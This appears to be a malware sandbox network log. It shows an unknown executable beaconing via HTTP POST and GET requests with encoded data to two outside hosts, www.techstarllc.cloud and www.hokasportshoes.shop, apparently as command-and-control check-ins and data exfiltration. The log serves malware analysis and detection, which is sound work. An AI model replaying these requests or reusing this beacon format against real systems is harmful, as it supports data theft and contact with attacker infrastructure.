                                                                                                                    Date: Tue, 24 Dec 2024 10:36:03 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZsQ0gaNf%2Fa1z2bvPwVStYfp19GJV5vM5uN6w3rQk08xy970kOa45GktnFXKL9h2dkmjmuHCMGVIej2lkjTXl9S149uKjFMJjqKjbkjIoU8Gew6RS2eOfA9HLxY9XuF%2BqonNmLDg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6ff2b71d3c18f6-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1630&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=423&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: a2<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.44976145.41.206.57801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:19.394500017 CET700OUTPOST /phws/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.techstarllc.cloud
                                                                                                                    Origin: http://www.techstarllc.cloud
                                                                                                                    Referer: http://www.techstarllc.cloud/phws/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 6c 65 31 59 61 64 6d 78 62 43 79 4c 39 2b 76 34 55 45 64 47 31 43 38 6d 79 69 5a 6c 78 52 56 6d 75 6a 44 34 79 62 45 45 4e 78 4f 57 35 57 2b 6f 61 49 74 68 58 49 6a 39 33 67 57 32 50 49 38 6a 76 50 6b 57 68 31 4a 54 4b 65 59 35 46 4c 50 6a 65 36 48 6a 7a 4a 30 6a 57 62 7a 49 51 62 79 48 50 36 46 63 76 32 4d 52 45 46 7a 70 30 59 38 66 2b 6a 45 61 44 2b 4a 71 48 4c 78 64 30 66 6e 61 4b 59 52 4a 4a 61 73 6b 32 34 58 77 30 4a 51 36 47 2f 2b 4f 64 66 75 6a 6c 78 32 48 6b 35 73 61 77 4b 51 55 67 6b 4e 6a 6c 6b 36 4e 6e 69 67 37 51 70 4d 33 49 7a 4a 33 57 4a 59 66 4f 53 38 46 70 51 3d 3d
                                                                                                                    Data Ascii: APatc2S=le1YadmxbCyL9+v4UEdG1C8myiZlxRVmujD4ybEENxOW5W+oaIthXIj93gW2PI8jvPkWh1JTKeY5FLPje6HjzJ0jWbzIQbyHP6Fcv2MREFzp0Y8f+jEaD+JqHLxd0fnaKYRJJask24Xw0JQ6G/+Odfujlx2Hk5sawKQUgkNjlk6Nnig7QpM3IzJ3WJYfOS8FpQ==
                                                                                                                    Dec 24, 2024 11:36:20.504039049 CET432INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.14.1
                                                                                                                    Date: Tue, 24 Dec 2024 10:36:20 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.44976645.41.206.57801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:22.053086996 CET720OUTPOST /phws/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.techstarllc.cloud
                                                                                                                    Origin: http://www.techstarllc.cloud
                                                                                                                    Referer: http://www.techstarllc.cloud/phws/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 6c 65 31 59 61 64 6d 78 62 43 79 4c 38 64 48 34 5a 44 4a 47 6b 79 38 68 2b 43 5a 6c 34 78 56 36 75 6a 50 34 79 65 6b 55 4d 45 2b 57 36 33 4f 6f 64 4a 74 68 51 49 6a 39 76 51 57 33 43 6f 38 73 76 50 70 6c 68 30 31 54 4b 65 4d 35 46 50 66 6a 65 70 76 73 68 70 30 39 65 37 7a 4f 55 62 79 48 50 36 46 63 76 32 59 72 45 47 44 70 30 70 4d 66 2f 48 6f 62 63 4f 4a 70 58 62 78 64 2b 2f 6e 65 4b 59 52 33 4a 59 59 61 32 36 66 77 30 49 67 36 47 75 2b 4e 55 66 75 35 72 52 32 54 6a 62 39 69 77 70 42 43 71 6b 68 51 34 33 6d 32 72 45 74 68 42 59 74 67 61 7a 74 45 4c 4f 52 72 44 52 42 4d 79 51 57 32 71 56 4a 59 4e 64 48 56 43 57 4f 4c 30 79 4e 30 70 34 34 3d
                                                                                                                    Data Ascii: APatc2S=le1YadmxbCyL8dH4ZDJGky8h+CZl4xV6ujP4yekUME+W63OodJthQIj9vQW3Co8svPplh01TKeM5FPfjepvshp09e7zOUbyHP6Fcv2YrEGDp0pMf/HobcOJpXbxd+/neKYR3JYYa26fw0Ig6Gu+NUfu5rR2Tjb9iwpBCqkhQ43m2rEthBYtgaztELORrDRBMyQW2qVJYNdHVCWOL0yN0p44=
                                                                                                                    Dec 24, 2024 11:36:23.167867899 CET432INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.14.1
                                                                                                                    Date: Tue, 24 Dec 2024 10:36:23 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.44977545.41.206.57801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:24.709280014 CET10802OUTPOST /phws/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.techstarllc.cloud
                                                                                                                    Origin: http://www.techstarllc.cloud
                                                                                                                    Referer: http://www.techstarllc.cloud/phws/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 6c 65 31 59 61 64 6d 78 62 43 79 4c 38 64 48 34 5a 44 4a 47 6b 79 38 68 2b 43 5a 6c 34 78 56 36 75 6a 50 34 79 65 6b 55 4d 46 71 57 35 42 61 6f 62 71 46 68 52 49 6a 39 6d 77 57 79 43 6f 38 31 76 50 77 4e 68 30 35 44 4b 63 30 35 4b 4e 58 6a 4b 49 76 73 34 5a 30 39 42 4c 7a 4c 51 62 7a 54 50 36 56 59 76 32 49 72 45 47 44 70 30 72 55 66 34 54 45 62 48 4f 4a 71 48 4c 78 52 30 66 6d 4c 4b 5a 30 4d 4a 59 64 76 31 4b 2f 77 33 6f 77 36 45 63 47 4e 57 2f 75 2f 37 42 33 55 6a 62 78 39 77 76 6c 34 71 6b 6b 59 34 77 4f 32 37 41 67 51 64 6f 39 6c 47 54 6c 5a 51 2f 4e 56 50 69 39 42 38 52 43 39 76 32 70 48 65 73 62 66 4d 30 44 4d 77 41 5a 76 77 34 49 56 53 39 33 62 4a 48 2b 57 77 6a 2b 76 73 4c 74 7a 58 72 50 58 32 47 42 78 4f 5a 2b 49 5a 7a 63 38 45 42 75 77 6b 76 4b 66 70 6d 5a 42 6e 68 52 37 34 49 36 58 70 6d 33 46 30 2f 4e 58 47 6c 45 61 67 67 5a 42 53 6d 69 6a 49 69 49 33 39 6e 46 2f 2f 49 42 46 76 42 4f 43 47 63 55 38 4f 59 59 59 45 6d 44 67 49 48 56 56 35 48 69 6f 52 39 72 4d 43 46 [TRUNCATED]
                                                                                                                    Data Ascii: APatc2S=le1YadmxbCyL8dH4ZDJGky8h+CZl4xV6ujP4yekUMFqW5BaobqFhRIj9mwWyCo81vPwNh05DKc05KNXjKIvs4Z09BLzLQbzTP6VYv2IrEGDp0rUf4TEbHOJqHLxR0fmLKZ0MJYdv1K/w3ow6EcGNW/u/7B3Ujbx9wvl4qkkY4wO27AgQdo9lGTlZQ/NVPi9B8RC9v2pHesbfM0DMwAZvw4IVS93bJH+Wwj+vsLtzXrPX2GBxOZ+IZzc8EBuwkvKfpmZBnhR74I6Xpm3F0/NXGlEaggZBSmijIiI39nF//IBFvBOCGcU8OYYYEmDgIHVV5HioR9rMCFWFxl9nHKqwhXfDuOEWThnt6oBQ/1vLmQKJhsvGTBIGC5uGOHn8lBdTCOmbxJZoxtB81hcFAV8+6/ubgZ6EyW7KqdpZKviBiAs9zSHPhHqbfFqo0DGUocc1C5kyIiJYjZPGx7VoQlCuJLHNSLbW7G7iqw6PKB8yqMXZwBwRv9r+RU/xWMQh3QTwlvM7Dqc3ZVY5cTJjCHGQMN1RRwVxTveInshpoYiMEaAlWFCVVMqTFfIe77btgHvNt2hru39PoXdZFW9KposvwKx563RmN2l57gbYGJTKdOdE8LTRRmm0kPpu4Or3USnD+z+F3VI97Qa1tgPWAm9u+YF/EOV1vlCYUHaQ75Kr0kC+rp1Fqjo+qVWdeckTAzKC0Sbi6mIR7g6IwLcd5wWA4mAzoDKShvGKRNQdBAd30bxbqG0QUmXicqvkzjNLHhs8GRpR1IJRXNtdv/flCtHTa5KxHG2XRz4sxXX2Eea3CWPkT8UUPymo8rQc0rn2r5XZKtbdzCMa/aO+Lyq70die0ytsGhNrrPN2DAb+SjjpACLCn8PseUfw9nPWPUMMP8bLhKATfLi27qsYszHgoUGCWv0W1ImU+jAeHewIfgg6GelD8pFkZ6tRfnQN0N5HCPXj0qPR1jFuK40/aObe3UtCBfaD0rdkfefWxzJmYfKzAMEu [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.44978145.41.206.57801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:27.360234976 CET426OUTGET /phws/?APatc2S=ocd4ZrzPXg6l4sWdfUN2xABm4ThkzzNaoz23ovA+FAa05WbJK6tPDbHnnDy/N4II5dY3pVgUKOhDHtvifryE7bJ5Z4nnWPOvcZ1hqHENcBbD3aMp/XsQNfk=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.techstarllc.cloud
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Dec 24, 2024 11:36:28.479993105 CET432INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.14.1
                                                                                                                    Date: Tue, 24 Dec 2024 10:36:28 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.449797199.59.243.227801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:34.178350925 CET706OUTPOST /vupi/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.hokasportshoes.shop
                                                                                                                    Origin: http://www.hokasportshoes.shop
                                                                                                                    Referer: http://www.hokasportshoes.shop/vupi/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 65 6f 51 66 4e 52 39 7a 4d 44 37 63 32 73 4c 39 59 46 64 47 42 37 76 57 35 39 48 52 7a 52 30 78 7a 6e 68 6f 44 39 4b 41 53 55 65 56 34 38 4c 73 69 2f 50 49 51 70 37 51 61 36 4c 6a 59 69 63 4d 43 4f 61 6d 73 5a 4d 50 6f 66 6a 62 66 78 54 6e 67 45 32 78 7a 75 4d 32 73 54 6c 37 77 37 73 72 39 56 2f 5a 6f 2b 45 77 55 4c 36 61 30 33 78 48 43 57 38 63 73 32 6a 6a 6a 32 71 63 65 32 2f 73 73 31 71 61 50 6e 4e 70 78 51 61 2f 50 6b 57 2f 42 44 4c 33 38 42 59 51 75 75 75 71 67 75 72 48 62 35 48 35 6c 6c 6b 70 5a 72 34 43 72 36 47 6e 47 2f 6b 65 35 4c 49 41 66 5a 43 71 79 2b 5a 4e 67 41 3d 3d
                                                                                                                    Data Ascii: APatc2S=eoQfNR9zMD7c2sL9YFdGB7vW59HRzR0xznhoD9KASUeV48Lsi/PIQp7Qa6LjYicMCOamsZMPofjbfxTngE2xzuM2sTl7w7sr9V/Zo+EwUL6a03xHCW8cs2jjj2qce2/ss1qaPnNpxQa/PkW/BDL38BYQuuuqgurHb5H5llkpZr4Cr6GnG/ke5LIAfZCqy+ZNgA==
                                                                                                                    Dec 24, 2024 11:36:35.259273052 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:36:34 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1142
                                                                                                                    x-request-id: 06108c7c-b569-463f-be63-99a5fb6e9bea
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCaF1QEFXu0Z5y8bGWEEJrL2+VPxGe29vkdocIIjGBzzqX+qr01lz1nPyCYFLSHQpSL6tj27364CGoVoW2UjAw==
                                                                                                                    set-cookie: parking_session=06108c7c-b569-463f-be63-99a5fb6e9bea; expires=Tue, 24 Dec 2024 10:51:35 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 43 61 46 31 51 45 46 58 75 30 5a 35 79 38 62 47 57 45 45 4a 72 4c 32 2b 56 50 78 47 65 32 39 76 6b 64 6f 63 49 49 6a 47 42 7a 7a 71 58 2b 71 72 30 31 6c 7a 31 6e 50 79 43 59 46 4c 53 48 51 70 53 4c 36 74 6a 32 37 33 36 34 43 47 6f 56 6f 57 32 55 6a 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCaF1QEFXu0Z5y8bGWEEJrL2+VPxGe29vkdocIIjGBzzqX+qr01lz1nPyCYFLSHQpSL6tj27364CGoVoW2UjAw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Dec 24, 2024 11:36:35.259351969 CET595INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDYxMDhjN2MtYjU2OS00NjNmLWJlNjMtOTlhNWZiNmU5YmVhIiwicGFnZV90aW1lIjoxNzM1MDM2NT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.449805199.59.243.227801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:36.836536884 CET726OUTPOST /vupi/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.hokasportshoes.shop
                                                                                                                    Origin: http://www.hokasportshoes.shop
                                                                                                                    Referer: http://www.hokasportshoes.shop/vupi/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 65 6f 51 66 4e 52 39 7a 4d 44 37 63 30 4e 37 39 62 6d 31 47 51 4c 76 56 32 64 48 52 34 78 30 31 7a 6e 6c 6f 44 38 2b 51 53 6d 71 56 35 63 37 73 77 4f 50 49 54 70 37 51 4f 71 4c 6d 57 43 63 39 43 4f 65 45 73 61 55 50 6f 62 7a 62 66 7a 4c 6e 67 30 4b 79 70 65 4d 30 6b 7a 6c 31 74 4c 73 72 39 56 2f 5a 6f 2b 41 57 55 50 75 61 30 48 42 48 44 33 38 64 77 6d 6a 67 6b 32 71 63 4a 6d 2f 6f 73 31 71 34 50 69 78 44 78 54 69 2f 50 6c 6d 2f 42 58 6e 30 72 52 59 57 68 4f 76 4a 6e 72 57 2b 56 4d 6a 74 6e 33 49 47 5a 2f 34 52 6e 63 4c 39 58 4f 46 4a 72 4c 73 7a 43 65 4c 65 2f 39 6b 45 37 43 44 6f 56 43 4a 78 47 64 37 43 67 38 79 71 2f 61 37 58 68 6e 4d 3d
                                                                                                                    Data Ascii: APatc2S=eoQfNR9zMD7c0N79bm1GQLvV2dHR4x01znloD8+QSmqV5c7swOPITp7QOqLmWCc9COeEsaUPobzbfzLng0KypeM0kzl1tLsr9V/Zo+AWUPua0HBHD38dwmjgk2qcJm/os1q4PixDxTi/Plm/BXn0rRYWhOvJnrW+VMjtn3IGZ/4RncL9XOFJrLszCeLe/9kE7CDoVCJxGd7Cg8yq/a7XhnM=
                                                                                                                    Dec 24, 2024 11:36:37.923403978 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:36:37 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1142
                                                                                                                    x-request-id: 405346e4-09a1-4019-9550-69d99c3d8027
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCaF1QEFXu0Z5y8bGWEEJrL2+VPxGe29vkdocIIjGBzzqX+qr01lz1nPyCYFLSHQpSL6tj27364CGoVoW2UjAw==
                                                                                                                    set-cookie: parking_session=405346e4-09a1-4019-9550-69d99c3d8027; expires=Tue, 24 Dec 2024 10:51:37 GMT; path=/
                                                                                                                    connection: close
